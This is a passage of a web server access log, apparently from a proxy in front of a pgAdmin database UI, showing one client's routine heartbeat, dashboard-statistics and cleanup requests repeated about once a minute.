"/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:25:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:26:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:27:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:27:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:28:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:28:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:29:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:29:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:30:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:30:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:31:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:32:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:32:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:33:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:33:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:34:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:34:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:35:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:35:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:36:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:37:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:37:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:38:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:38:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:39:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:39:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:40:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:40:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:41:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:42:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:42:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:43:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:43:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:44:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:44:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:45:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:45:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:46:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:47:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:47:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:48:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:48:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:49:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:49:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:50:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:50:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:51:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:51:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:52:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:52:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:53:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:53:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:54:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:54:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:55:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:55:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:56:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:56:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:56:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:57:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:57:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:58:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:58:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:59:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 